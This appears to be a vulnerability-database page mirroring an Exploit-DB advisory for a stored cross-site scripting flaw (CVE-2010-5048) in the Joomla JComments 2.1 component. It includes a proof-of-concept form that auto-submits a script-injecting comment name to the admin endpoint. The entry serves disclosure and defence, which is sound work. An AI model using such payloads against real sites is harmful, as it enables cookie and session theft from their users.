Lucene search
+L

Joomla! Component JComments 2.1 - 'ComntrNam' Cross-Site Scripting

🗓️ 18 May 2010 00:00:00Reported by High-Tech Bridge SAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 404 Views

Joomla JComments 2.1 Component 'ComntrNam' XSS Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-5048
18 May 201000:00
circl
CVE
CVE-2010-5048
23 Nov 201101:00
cve
Cvelist
CVE-2010-5048
23 Nov 201101:00
cvelist
EUVD
EUVD-2010-5012
7 Oct 202500:30
euvd
htbridge
Cross-site Scripting (XSS) Vulnerability in JComments Component for Joomla!
4 May 201000:00
htbridge
NVD
CVE-2010-5048
23 Nov 201101:55
nvd
Prion
Cross site scripting
23 Nov 201101:55
prion
source: https://www.securityfocus.com/bid/40230/info

The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Versions prior to JComments 2.2 are vulnerable.

<form method="POST" action="http://joomla/administrator/index.php" name="main"> <input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="comment" value="comment text"> <input type="hidden" name="published" value="1"> <input type="hidden" name="option" value="com_jcomments"> <input type="hidden" name="id" value="1"> <input type="hidden" name="task" value="save"> </form> <script> document.main.submit(); </script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01745
404